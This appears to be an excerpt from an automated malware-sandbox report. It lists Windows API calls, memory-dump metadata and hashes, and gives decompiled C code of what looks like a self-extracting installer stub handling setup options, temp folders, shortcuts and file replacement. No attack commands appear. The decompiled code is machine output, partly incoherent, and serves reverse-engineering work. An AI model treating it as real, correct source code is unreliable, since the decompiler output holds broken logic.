                0x00cb022f
                0x00cb0249
                0x00cb0249
                0x00cb02d5
                0x00cb02d5
                0x00cb019a
                0x00cb019c
                0x00cb019c
                0x00cb01ad
                0x00cb01ba
                0x00cb01be
                0x00000000
                0x00000000
                0x00cb01c0
                0x00cb01c4
                0x00000000
                0x00000000
                0x00000000
                0x00cb01c6
                0x00cb01c8
                0x00000000
                0x00cb01c8
                0x00cb0143
                0x00cb0158
                0x00cb015e
                0x00cb0161
                0x00000000
                0x00000000
                0x00000000
                0x00cb0161
                0x00cb0187
                0x00cb0187
                0x00cb0188
                0x00000000
                0x00cb018d
                0x00cb0031
                0x00cb0033
                0x00cb0036
                0x00000000
                0x00000000
                0x00cb0047
                0x00cb0065
                0x00cb0069
                0x00cb00e7
                0x00cb00e8
                0x00cb00ee
                0x00000000
                0x00cb007b
                0x00cb0090
                0x00cb0096
                0x00cb0098
                0x00000000
                0x00000000
                0x00cb00a0
                0x00cb00a2
                0x00cb00a7
                0x00cb00b6
                0x00cb00be
                0x00cb00dc
                0x00cb00e1
                0x00cb00e3
                0x00cb00e5
                0x00000000
                0x00000000
                0x00cb00c9
                0x00cb00ce
                0x00cb00da
                0x00cb00db
                0x00cb00db
                0x00000000
                0x00cb00dc
                0x00cb0069
                0x00cafd79
                0x00cafd7b
                0x00cafd84
                0x00cafd8b
                0x00cafd8d
                0x00cafd94
                0x00cafd94
                0x00cafd9c
                0x00cafda0
                0x00cafdb0
                0x00cafdb7
                0x00cafdb9
                0x00cafdb9
                0x00000000

                APIs
                • GetModuleHandleW.KERNEL32 ref: 00CAFD61
                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CAFD79
                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CAFD9C
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CB0047
                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB005F
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CB0071
                • ReadFile.KERNEL32(00000000,?,00007FFE,00CD28D4,00000000), ref: 00CB0090
                • CloseHandle.KERNEL32(00000000), ref: 00CB00E8
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CB00FE
                • CompareStringW.KERNELBASE(00000400,00001001,00CD2920,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00CB0158
                • GetFileAttributesW.KERNELBASE(?,?,00CD28EC,00000800,?,00000000,?,00000800), ref: 00CB0181
                • GetFileAttributesW.KERNEL32(?,?,00CD29AC,00000800), ref: 00CB01BA
                  • Part of subcall function 00CAFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CAFD18
                  • Part of subcall function 00CAFCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAE7F6,Crypt32.dll,?,00CAE878,?,00CAE85C,?,?,?,?), ref: 00CAFD3A
                • _swprintf.LIBCMT ref: 00CB022A
                • _swprintf.LIBCMT ref: 00CB0276
                  • Part of subcall function 00CA3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA3E54
                • AllocConsole.KERNEL32 ref: 00CB027E
                • GetCurrentProcessId.KERNEL32 ref: 00CB0288
                • AttachConsole.KERNEL32(00000000), ref: 00CB028F
                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00CB02B5
                • WriteConsoleW.KERNEL32(00000000), ref: 00CB02BC
                • Sleep.KERNEL32(00002710), ref: 00CB02C7
                • FreeConsole.KERNEL32 ref: 00CB02CD
                • ExitProcess.KERNEL32 ref: 00CB02D5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                • API String ID: 1201351596-3298887752
                • Opcode ID: 19d31298ece57ec8ddbbb486b35fe60c582bc42dad4937c8d834b992a5c53fe2
                • Instruction ID: f71869c2aef5043ca70632152450f55ef63d9bc9f33c24b3b3d480865daa2f43
                • Opcode Fuzzy Hash: 19d31298ece57ec8ddbbb486b35fe60c582bc42dad4937c8d834b992a5c53fe2
                • Instruction Fuzzy Hash: ABD170F1008385ABDB35DF50C849BDFBBE8FFA5304F50491EE6899A240CBB09549DB62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBB4C7, Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 438windowfileCOMMON
                Download Yara Rule
                C-Code - Quality: 49%
                			E00CBB4C7(void* __edx) {
				intOrPtr _t215;
				void* _t220;
				intOrPtr _t278;
				void* _t291;
				WCHAR* _t293;
				void* _t296;
				WCHAR* _t297;
				void* _t302;

				_t291 = __edx;
				E00CBD870(E00CD150B, _t302);
				_t215 = 0x1bc80;
				E00CBD940();
				if( *((intOrPtr*)(_t302 + 0xc)) == 0) {
					L169:
					 *[fs:0x0] =  *((intOrPtr*)(_t302 - 0xc));
					return _t215;
				}
				_push(0x1000);
				_push(_t302 - 0xe);
				_push(_t302 - 0xd);
				_push(_t302 - 0x5c84);
				_push(_t302 - 0xfc8c);
				_push( *((intOrPtr*)(_t302 + 0xc)));
				_t215 = E00CBA156();
				 *((intOrPtr*)(_t302 + 0xc)) = 0x1bc80;
				if(0x1bc80 != 0) {
					_t278 =  *((intOrPtr*)(_t302 + 0x10));
					do {
						_t220 = _t302 - 0x5c84;
						_t296 = _t302 - 0x1bc8c;
						_t293 = 6;
						goto L4;
						L6:
						while(E00CB1410(_t302 - 0xfc8c,  *((intOrPtr*)(0xcdd618 + _t297 * 4))) != 0) {
							_t297 =  &(_t297[0]);
							if(_t297 < 0xe) {
								continue;
							} else {
								goto L167;
							}
						}
						if(_t297 > 0xd) {
							goto L167;
						}
						switch( *((intOrPtr*)(_t297 * 4 +  &M00CBC0D7))) {
							case 0:
								__eflags = _t278 - 2;
								if(_t278 != 2) {
									goto L167;
								}
								_t299 = 0x800;
								E00CB95F8(_t302 - 0x7c84, 0x800);
								E00CAA188(E00CAB625(_t302 - 0x7c84, _t302 - 0x5c84, _t302 - 0xdc8c, 0x800), _t278, _t302 - 0x8c8c, 0x800);
								 *(_t302 - 4) = _t293;
								E00CAA2C2(_t302 - 0x8c8c, _t302 - 0xdc8c);
								E00CA6EF9(_t302 - 0x3c84);
								_push(_t293);
								_t286 = _t302 - 0x8c8c;
								_t238 = E00CAA215(_t302 - 0x8c8c, _t291, _t302 - 0x3c84);
								__eflags = _t238;
								if(_t238 == 0) {
									L28:
									 *(_t302 - 4) =  *(_t302 - 4) | 0xffffffff;
									E00CAA19E(_t302 - 0x8c8c);
									goto L167;
								} else {
									goto L15;
									L16:
									E00CAB1B7(_t286, __eflags, _t302 - 0x7c84, _t302 - 0x103c, _t299);
									E00CAAEA5(__eflags, _t302 - 0x103c, _t299);
									_t301 = E00CC2B33(_t302 - 0x7c84);
									__eflags = _t301 - 4;
									if(_t301 < 4) {
										L18:
										_t266 = E00CAB5E5(_t302 - 0x5c84);
										__eflags = _t266;
										if(_t266 != 0) {
											goto L28;
										}
										L19:
										_t268 = E00CC2B33(_t302 - 0x3c84);
										__eflags = 0;
										 *((short*)(_t302 + _t268 * 2 - 0x3c82)) = 0;
										E00CBE920(_t293, _t302 - 0x3c, _t293, 0x1e);
										_t304 = _t304 + 0x10;
										 *((intOrPtr*)(_t302 - 0x38)) = 3;
										_push(0x14);
										_pop(_t271);
										 *((short*)(_t302 - 0x2c)) = _t271;
										 *((intOrPtr*)(_t302 - 0x34)) = _t302 - 0x3c84;
										_push(_t302 - 0x3c);
										 *0xcddef4();
										goto L20;
									}
									_t276 = E00CC2B33(_t302 - 0x103c);
									__eflags = _t301 - _t276;
									if(_t301 > _t276) {
										goto L19;
									}
									goto L18;
									L20:
									_t243 = GetFileAttributesW(_t302 - 0x3c84);
									__eflags = _t243 - 0xffffffff;
									if(_t243 == 0xffffffff) {
										L27:
										_push(_t293);
										_t286 = _t302 - 0x8c8c;
										_t245 = E00CAA215(_t302 - 0x8c8c, _t291, _t302 - 0x3c84);
										__eflags = _t245;
										if(_t245 != 0) {
											_t299 = 0x800;
											L15:
											SetFileAttributesW(_t302 - 0x3c84, _t293);
											__eflags =  *((char*)(_t302 - 0x2c78));
											if(__eflags == 0) {
												goto L20;
											}
											goto L16;
										}
										goto L28;
									}
									_t247 = DeleteFileW(_t302 - 0x3c84);
									__eflags = _t247;
									if(_t247 != 0) {
										goto L27;
									} else {
										_t300 = _t293;
										_push(_t293);
										goto L24;
										L24:
										E00CA3E41(_t302 - 0x103c, 0x800, L"%s.%d.tmp", _t302 - 0x3c84);
										_t304 = _t304 + 0x14;
										_t252 = GetFileAttributesW(_t302 - 0x103c);
										__eflags = _t252 - 0xffffffff;
										if(_t252 != 0xffffffff) {
											_t300 = _t300 + 1;
											__eflags = _t300;
											_push(_t300);
											goto L24;
										} else {
											_t255 = MoveFileW(_t302 - 0x3c84, _t302 - 0x103c);
											__eflags = _t255;
											if(_t255 != 0) {
												MoveFileExW(_t302 - 0x103c, _t293, 4);
											}
											goto L27;
										}
									}
								}
							case 1:
								__eflags = __ebx;
								if(__ebx == 0) {
									__eax = E00CC2B33(__esi);
									__eax = __eax + __edi;
									_push(__eax);
									_push( *0xcfce0c);
									__eax = E00CC2B5E(__ecx, __edx);
									__esp = __esp + 0xc;
									__eflags = __eax;
									if(__eax != 0) {
										 *0xcfce0c = __eax;
										__eflags = __bl;
										if(__bl != 0) {
											__ecx = 0;
											__eflags = 0;
											 *__eax = __cx;
										}
										__eax = E00CC66ED(__eax, __esi);
										_pop(__ecx);
										_pop(__ecx);
									}
									__eflags = __bh;
									if(__bh == 0) {
										__eax = L00CC2B4E(__esi);
									}
								}
								goto L167;
							case 2:
								__eflags = __ebx;
								if(__ebx == 0) {
									__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
								}
								goto L167;
							case 3:
								__eflags = __ebx;
								if(__ebx != 0) {
									goto L167;
								}
								__eflags =  *0xce9602 - __di;
								if( *0xce9602 != __di) {
									goto L167;
								}
								__eax = 0;
								__edi = __ebp - 0x5c84;
								_push(0x22);
								 *(__ebp - 0x103c) = __ax;
								_pop(__eax);
								__eflags =  *(__ebp - 0x5c84) - __ax;
								if( *(__ebp - 0x5c84) == __ax) {
									__edi = __ebp - 0x5c82;
								}
								__eax = E00CC2B33(__edi);
								__esi = 0x800;
								__eflags = __eax - 0x800;
								if(__eax >= 0x800) {
									goto L167;
								} else {
									__eax =  *__edi & 0x0000ffff;
									_push(0x5c);
									_pop(__ecx);
									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
									if(( *__edi & 0x0000ffff) != 0x2e) {
										L54:
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L66:
											__ebp - 0x103c = E00CAFAB1(__ebp - 0x103c, __edi, __esi);
											__ebx = 0;
											__eflags = 0;
											L67:
											_push(0x22);
											_pop(__eax);
											__eax = __ebp - 0x103c;
											__eax = E00CC0D9B(__ebp - 0x103c, __ebp - 0x103c);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
												if( *((intOrPtr*)(__eax + 2)) == __bx) {
													__ecx = 0;
													__eflags = 0;
													 *__eax = __cx;
												}
											}
											__eax = __ebp - 0x103c;
											__edi = 0xce9602;
											E00CAFAB1(0xce9602, __ebp - 0x103c, __esi) = __ebp - 0x103c;
											__eax = E00CB9FFC(__ebp - 0x103c, __esi);
											__esi = GetDlgItem( *(__ebp + 8), 0x66);
											__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
											__ebx =  *0xcddf7c;
											__eax = SendMessageW(__esi, 0x143, __ebx, 0xce9602); // executed
											__eax = __ebp - 0x103c;
											__eax = E00CC2B69(__ebp - 0x103c, 0xce9602, __eax);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__ebp - 0x103c = 0;
												__eax = SendMessageW(__esi, 0x143, 0, __ebp - 0x103c);
											}
											goto L167;
										}
										__eflags = __ax;
										if(__ax == 0) {
											L57:
											__eax = __ebp - 0x18;
											__ebx = 0;
											_push(__ebp - 0x18);
											_push(1);
											_push(0);
											_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
											_push(0x80000002);
											__eax =  *0xcddea8();
											__eflags = __eax;
											if(__eax == 0) {
												__eax = __ebp - 0x14;
												 *(__ebp - 0x14) = 0x1000;
												_push(__ebp - 0x14);
												__eax = __ebp - 0x103c;
												_push(__ebp - 0x103c);
												__eax = __ebp - 0x1c;
												_push(__ebp - 0x1c);
												_push(0);
												_push(L"ProgramFilesDir");
												_push( *(__ebp - 0x18));
												__eax =  *0xcddea4();
												_push( *(__ebp - 0x18));
												 *0xcdde84() =  *(__ebp - 0x14);
												__ecx = 0x7ff;
												__eax =  *(__ebp - 0x14) >> 1;
												__eflags = __eax - 0x7ff;
												if(__eax >= 0x7ff) {
													__eax = 0x7ff;
												}
												__ecx = 0;
												__eflags = 0;
												 *(__ebp + __eax * 2 - 0x103c) = __cx;
											}
											__eflags =  *(__ebp - 0x103c) - __bx;
											if( *(__ebp - 0x103c) != __bx) {
												__eax = __ebp - 0x103c;
												__eax = E00CC2B33(__ebp - 0x103c);
												_push(0x5c);
												_pop(__ecx);
												__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
												if(__eflags != 0) {
													__ebp - 0x103c = E00CAFA89(__eflags, __ebp - 0x103c, "\\", __esi);
												}
											}
											__esi = E00CC2B33(__edi);
											__eax = __ebp - 0x103c;
											__eflags = __esi - 0x7ff;
											__esi = 0x800;
											if(__eflags < 0) {
												__ebp - 0x103c = E00CAFA89(__eflags, __ebp - 0x103c, __edi, 0x800);
											}
											goto L67;
										}
										__eflags =  *((short*)(__edi + 2)) - 0x3a;
										if( *((short*)(__edi + 2)) == 0x3a) {
											goto L66;
										}
										goto L57;
									}
									__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
									if( *((intOrPtr*)(__edi + 2)) != __cx) {
										goto L54;
									}
									__edi = __edi + 4;
									__ebx = 0;
									__eflags =  *__edi - __bx;
									if( *__edi == __bx) {
										goto L167;
									} else {
										__ebp - 0x103c = E00CAFAB1(__ebp - 0x103c, __edi, 0x800);
										goto L67;
									}
								}
							case 4:
								__eflags =  *0xce95fc - 1;
								__eflags = __eax - 0xce95fc;
								 *__edi =  *__edi + __ecx;
								__eflags =  *(__ebx + 6) & __bl;
								 *__eax =  *__eax + __al;
								__eflags =  *__eax;
							case 5:
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__ecx = 0;
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__eflags = __eax;
								if(__eax == 0) {
									L84:
									 *0xce75d2 = __cl;
									 *0xce75d3 = 1;
									goto L167;
								}
								__eax = __eax - 0x30;
								__eflags = __eax;
								if(__eax == 0) {
									 *0xce75d2 = __cl;
									L83:
									 *0xce75d3 = __cl;
									goto L167;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									goto L84;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax != 0) {
									goto L167;
								}
								 *0xce75d2 = 1;
								goto L83;
							case 6:
								__eflags = __ebx - 4;
								if(__ebx != 4) {
									goto L94;
								}
								__eax = __ebp - 0x5c84;
								__eax = E00CC2B69(__ebp - 0x5c84, __eax, L"<>");
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax == 0) {
									goto L94;
								}
								_push(__edi);
								goto L93;
							case 7:
								__eflags = __ebx - 1;
								if(__eflags != 0) {
									L115:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										__eflags =  *0xce95fc;
										if( *0xce95fc == 0) {
											 *0xce95fc = 2;
										}
										 *0xce85f8 = 1;
									}
									goto L167;
								}
								__eax = __ebp - 0x7c84;
								__edi = 0x800;
								GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
								E00CAAEA5(__eflags, __ebp - 0x7c84, 0x800) = 0;
								__esi = 0;
								_push(0);
								while(1) {
									_push( *0xcdd5f8);
									__ebp - 0x7c84 = E00CA3E41(0xce85fa, __edi, L"%s%s%u", __ebp - 0x7c84);
									__eax = E00CA9E6B(0xce85fa);
									__eflags = __al;
									if(__al == 0) {
										break;
									}
									__esi =  &(__esi->i);
									__eflags = __esi;
									_push(__esi);
								}
								__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xce85fa);
								__eflags =  *(__ebp - 0x5c84);
								if( *(__ebp - 0x5c84) == 0) {
									goto L167;
								}
								__eflags =  *0xcf5d02;
								if( *0xcf5d02 != 0) {
									goto L167;
								}
								__eax = 0;
								 *(__ebp - 0x143c) = __ax;
								__eax = __ebp - 0x5c84;
								_push(0x2c);
								_push(__ebp - 0x5c84);
								__eax = E00CC0BB8(__ecx);
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax != 0) {
									L111:
									__eflags =  *(__ebp - 0x143c);
									if( *(__ebp - 0x143c) == 0) {
										__ebp - 0x1bc8c = __ebp - 0x5c84;
										E00CAFAB1(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
										__ebp - 0x143c = E00CAFAB1(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
									}
									__ebp - 0x5c84 = E00CB9C4F(__ebp - 0x5c84);
									__eax = 0;
									 *(__ebp - 0x4c84) = __ax;
									__ebp - 0x143c = __ebp - 0x5c84;
									__eax = E00CB9735( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
									__eflags = __eax - 6;
									if(__eax == 6) {
										goto L167;
									} else {
										__eax = 0;
										__eflags = 0;
										 *0xce75d7 = 1;
										 *0xce85fa = __ax;
										__eax = EndDialog( *(__ebp + 8), 1);
										goto L115;
									}
								}
								__edx = 0;
								__esi = 0;
								__eflags =  *(__ebp - 0x5c84) - __dx;
								if( *(__ebp - 0x5c84) == __dx) {
									goto L111;
								}
								__ecx = 0;
								__eax = __ebp - 0x5c84;
								while(1) {
									__eflags =  *__eax - 0x40;
									if( *__eax == 0x40) {
										break;
									}
									__esi =  &(__esi->i);
									__eax = __ebp - 0x5c84;
									__ecx = __esi + __esi;
									__eax = __ebp - 0x5c84 + __ecx;
									__eflags =  *__eax - __dx;
									if( *__eax != __dx) {
										continue;
									}
									goto L111;
								}
								__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
								__ebp - 0x143c = E00CAFAB1(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
								__eax = 0;
								__eflags = 0;
								 *(__ebp + __esi * 2 - 0x5c84) = __ax;
								goto L111;
							case 8:
								__eflags = __ebx - 3;
								if(__ebx == 3) {
									__eflags =  *(__ebp - 0x5c84) - __di;
									if(__eflags != 0) {
										__eax = __ebp - 0x5c84;
										_push(__ebp - 0x5c84);
										__eax = E00CC668C(__ebx, __edi);
										_pop(__ecx);
										 *0xcfde1c = __eax;
									}
									__eax = __ebp + 0xc;
									_push(__ebp + 0xc);
									 *0xcfde18 = E00CBA2AE(__ecx, __edx, __eflags);
								}
								 *0xcf5d03 = 1;
								goto L167;
							case 9:
								__eflags = __ebx - 5;
								if(__ebx != 5) {
									L94:
									 *0xcfde20 = 1;
									goto L167;
								}
								_push(1);
								L93:
								__eax = __ebp - 0x5c84;
								_push(__ebp - 0x5c84);
								_push( *(__ebp + 8));
								__eax = E00CBC431();
								goto L94;
							case 0xa:
								__eflags = __ebx - 6;
								if(__ebx != 6) {
									goto L167;
								}
								__eax = 0;
								 *(__ebp - 0x2c3c) = __ax;
								__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
								__eax = E00CC59C0( *(__ebp - 0x1bc8c) & 0x0000ffff);
								_push(0x800);
								__eflags = __eax - 0x50;
								if(__eax == 0x50) {
									_push(0xcfad0a);
									__eax = __ebp - 0x2c3c;
									_push(__ebp - 0x2c3c);
									__eax = E00CAFAB1();
									 *(__ebp - 0x14) = 2;
								} else {
									__eflags = __eax - 0x54;
									__eax = __ebp - 0x2c3c;
									if(__eflags == 0) {
										_push(0xcf9d0a);
										_push(__eax);
										__eax = E00CAFAB1();
										 *(__ebp - 0x14) = 7;
									} else {
										_push(0xcfbd0a);
										_push(__eax);
										__eax = E00CAFAB1();
										 *(__ebp - 0x14) = 0x10;
									}
								}
								__eax = 0;
								 *(__ebp - 0x9c8c) = __ax;
								 *(__ebp - 0x1c3c) = __ax;
								__ebp - 0x19c8c = __ebp - 0x6c84;
								__eax = E00CC4D7E(__ebp - 0x6c84, __ebp - 0x19c8c);
								_pop(__ecx);
								_pop(__ecx);
								_push(0x22);
								_pop(__ebx);
								__eflags =  *(__ebp - 0x6c84) - __bx;
								if( *(__ebp - 0x6c84) != __bx) {
									__ebp - 0x6c84 = E00CA9E6B(__ebp - 0x6c84);
									__eflags = __al;
									if(__al != 0) {
										goto L152;
									}
									__ebx = __edi;
									__esi = __ebp - 0x6c84;
									__eflags =  *(__ebp - 0x6c84) - __bx;
									if( *(__ebp - 0x6c84) == __bx) {
										goto L152;
									}
									_push(0x20);
									_pop(__ecx);
									do {
										__eax = __esi->i & 0x0000ffff;
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L140:
											__edi = __eax;
											__eax = 0;
											__esi->i = __ax;
											__ebp - 0x6c84 = E00CA9E6B(__ebp - 0x6c84);
											__eflags = __al;
											if(__al == 0) {
												__esi->i = __di;
												L148:
												_push(0x20);
												_pop(__ecx);
												__edi = 0;
												__eflags = 0;
												goto L149;
											}
											_push(0x2f);
											_pop(__eax);
											__ebx = __esi;
											__eflags = __di - __ax;
											if(__di != __ax) {
												_push(0x20);
												_pop(__eax);
												do {
													__esi =  &(__esi->i);
													__eflags = __esi->i - __ax;
												} while (__esi->i == __ax);
												_push(__esi);
												__eax = __ebp - 0x1c3c;
												L146:
												_push(__eax);
												__eax = E00CC4D7E();
												_pop(__ecx);
												_pop(__ecx);
												 *__ebx = __di;
												goto L148;
											}
											 *(__ebp - 0x1c3c) = __ax;
											__eax =  &(__esi->i);
											_push( &(__esi->i));
											__eax = __ebp - 0x1c3a;
											goto L146;
										}
										_push(0x2f);
										_pop(__edx);
										__eflags = __ax - __dx;
										if(__ax != __dx) {
											goto L149;
										}
										goto L140;
										L149:
										__esi =  &(__esi->i);
										__eflags = __esi->i - __di;
									} while (__esi->i != __di);
									__eflags = __ebx;
									if(__ebx != 0) {
										__eax = 0;
										__eflags = 0;
										 *__ebx = __ax;
									}
									goto L152;
								} else {
									__ebp - 0x19c8a = __ebp - 0x6c84;
									E00CC4D7E(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
									_push(__ebx);
									_push(__ebp - 0x6c82);
									__eax = E00CC0BB8(__ecx);
									__esp = __esp + 0x10;
									__eflags = __eax;
									if(__eax != 0) {
										__ecx = 0;
										 *__eax = __cx;
										__ebp - 0x1c3c = E00CC4D7E(__ebp - 0x1c3c, __ebp - 0x1c3c);
										_pop(__ecx);
										_pop(__ecx);
									}
									L152:
									__eflags =  *(__ebp - 0x11c8c);
									__ebx = 0x800;
									if( *(__ebp - 0x11c8c) != 0) {
										_push(0x800);
										__eax = __ebp - 0x9c8c;
										_push(__ebp - 0x9c8c);
										__eax = __ebp - 0x11c8c;
										_push(__ebp - 0x11c8c);
										__eax = E00CAAED7();
									}
									_push(__ebx);
									__eax = __ebp - 0xbc8c;
									_push(__ebp - 0xbc8c);
									__eax = __ebp - 0x6c84;
									_push(__ebp - 0x6c84);
									__eax = E00CAAED7();
									__eflags =  *(__ebp - 0x2c3c);
									if(__eflags == 0) {
										__ebp - 0x2c3c = E00CBA24E(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14));
									}
									__ebp - 0x2c3c = E00CAAEA5(__eflags, __ebp - 0x2c3c, __ebx);
									__eflags =  *((short*)(__ebp - 0x17c8c));
									if(__eflags != 0) {
										__ebp - 0x17c8c = __ebp - 0x2c3c;
										E00CAFA89(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
										__eax = E00CAAEA5(__eflags, __ebp - 0x2c3c, __ebx);
									}
									__ebp - 0x2c3c = __ebp - 0xcc8c;
									__eax = E00CC4D7E(__ebp - 0xcc8c, __ebp - 0x2c3c);
									__eflags =  *(__ebp - 0x13c8c);
									__eax = __ebp - 0x13c8c;
									_pop(__ecx);
									_pop(__ecx);
									if(__eflags == 0) {
										__eax = __ebp - 0x19c8c;
									}
									__ebp - 0x2c3c = E00CAFA89(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
									__eax = __ebp - 0x2c3c;
									__eflags = E00CAB153(__ebp - 0x2c3c);
									if(__eflags == 0) {
										L162:
										__ebp - 0x2c3c = E00CAFA89(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
										goto L163;
									} else {
										__eflags = __eax;
										if(__eflags == 0) {
											L163:
											_push(1);
											__eax = __ebp - 0x2c3c;
											_push(__ebp - 0x2c3c);
											E00CA9D3A(__ecx, __ebp) = __ebp - 0xbc8c;
											__ebp - 0xac8c = E00CC4D7E(__ebp - 0xac8c, __ebp - 0xbc8c);
											_pop(__ecx);
											_pop(__ecx);
											__ebp - 0xac8c = E00CAB98D(__eflags, __ebp - 0xac8c);
											__ecx =  *(__ebp - 0x1c3c) & 0x0000ffff;
											__eax = __ebp - 0x1c3c;
											__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff);
											__edx = __ebp - 0x9c8c;
											__esi = __ebp - 0xac8c;
											asm("sbb ecx, ecx");
											__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c;
											 *(__ebp - 0x9c8c) & 0x0000ffff =  ~( *(__ebp - 0x9c8c) & 0x0000ffff);
											asm("sbb eax, eax");
											__eax =  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c;
											 *(__ebp - 0xac8c) & 0x0000ffff =  ~( *(__ebp - 0xac8c) & 0x0000ffff);
											__eax = __ebp - 0x15c8c;
											asm("sbb edx, edx");
											__edx =  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi;
											E00CB9D41(__ebp - 0x15c8c) = __ebp - 0x2c3c;
											__ebp - 0xbc8c = E00CB9450(__ecx, __edi, __ebp - 0xbc8c, __ebp - 0x2c3c,  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi, __ebp - 0xbc8c,  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c,  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c);
											__eflags =  *(__ebp - 0xcc8c);
											if( *(__ebp - 0xcc8c) != 0) {
												_push(__edi);
												__eax = __ebp - 0xcc8c;
												_push(__ebp - 0xcc8c);
												_push(5);
												_push(0x1000);
												__eax =  *0xcddef8();
											}
											goto L167;
										}
										goto L162;
									}
								}
							case 0xb:
								__eflags = __ebx - 7;
								if(__ebx == 7) {
									 *0xce9600 = 1;
								}
								goto L167;
							case 0xc:
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__eax = E00CC59C0( *(__ebp - 0x5c84) & 0x0000ffff);
								__eflags = __eax - 0x46;
								if(__eax == 0x46) {
									 *0xce75d4 = 1;
								} else {
									__eflags = __eax - 0x55;
									if(__eax == 0x55) {
										 *0xce75d5 = 1;
									} else {
										__eax = 0;
										 *0xce75d4 = __al;
										 *0xce75d5 = __al;
									}
								}
								goto L167;
							case 0xd:
								 *0xcfde21 = 1;
								__eax = __eax + 0xcfde21;
								_t112 = __esi + 0x39;
								 *_t112 =  *(__esi + 0x39) + __esp;
								__eflags =  *_t112;
								__ebp = 0xffffa37c;
								if( *_t112 != 0) {
									_t114 = __ebp - 0x5c84; // 0xffff46f8
									__eax = _t114;
									_push(_t114);
									 *0xcdd5fc = E00CB13FC();
								}
								goto L167;
						}
						L4:
						_t220 = E00CB9E24(_t220, _t296);
						_t296 = _t296 + 0x2000;
						_t293 = _t293 - 1;
						if(_t293 != 0) {
							goto L4;
						} else {
							_t297 = _t293;
							goto L6;
						}
						L167:
						_push(0x1000);
						_t205 = _t302 - 0xe; // 0xffffa36e
						_t206 = _t302 - 0xd; // 0xffffa36f
						_t207 = _t302 - 0x5c84; // 0xffff46f8
						_t208 = _t302 - 0xfc8c; // 0xfffea6f0
						_push( *((intOrPtr*)(_t302 + 0xc)));
						_t215 = E00CBA156();
						_t278 =  *((intOrPtr*)(_t302 + 0x10));
						 *((intOrPtr*)(_t302 + 0xc)) = _t215;
					} while (_t215 != 0);
				}
			}











                0x00cbb4c7
                0x00cbb4cc
                0x00cbb4d1
                0x00cbb4d6
                0x00cbb4df
                0x00cbc0c7
                0x00cbc0ca
